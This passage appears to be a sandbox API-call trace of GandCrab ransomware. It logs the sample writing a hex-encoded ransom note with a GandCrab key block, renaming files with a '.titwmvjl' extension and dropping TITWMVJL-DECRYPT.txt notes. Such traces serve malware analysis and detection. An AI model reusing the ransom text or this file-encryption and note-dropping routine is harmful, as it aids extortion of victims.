65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.622] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0070.623] CloseHandle (hObject=0x2bc) returned 1 [0070.623] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.624] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.624] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x3a6)) [0070.624] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.624] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.624] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.624] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a09d2ca4deb61a.lock") returned 85 [0070.624] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0070.625] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.626] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\") returned 61 [0070.626] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0070.626] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5037b8 [0070.626] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.626] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.626] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.626] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.626] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.626] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.626] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.626] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a09d2ca4deb61a.lock" [0070.626] lstrlenW (lpString=".titwmvjl") returned 9 [0070.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a09d2ca4deb61a.lock") returned 85 [0070.626] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.626] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 94 [0070.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a09d2ca4deb61a.lock") returned 85 [0070.627] lstrlenW (lpString=".lock") returned 5 [0070.627] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.627] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.627] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.627] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.627] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.627] lstrcmpW (lpString1="Style", lpString2=".") returned 1 [0070.627] lstrcmpW (lpString1="Style", lpString2="..") returned 1 [0070.627] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2="Style" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0070.627] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\" [0070.627] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.627] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.628] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.628] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.628] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.628] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.629] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.629] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.629] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\\\TITWMVJL-DECRYPT.txt") returned 88 [0070.629] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0070.632] lstrlenW 